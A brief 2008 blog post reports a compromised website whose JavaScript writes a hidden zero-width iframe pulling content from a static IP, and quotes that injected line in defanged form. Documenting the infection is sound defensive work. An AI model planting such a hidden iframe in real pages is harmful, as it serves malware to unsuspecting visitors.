Today i came across with an hacked web site containing some javascript files pointing to a static IP. The content of the webpage hosted by the infected PCs is an iframe from 91.203.93.4, inserted via javascript like this:
document.write "-i-frame sr-c=h||p://91.203.93.4/ cgi-bin/index.cgi?ad width=0 height=0 frameborder=0 iframe " ;
You can read more about it on:
http://www.matchent.com/wpress/index.php?q=comment/reply/365
Monday, August 11, 2008
RBN?
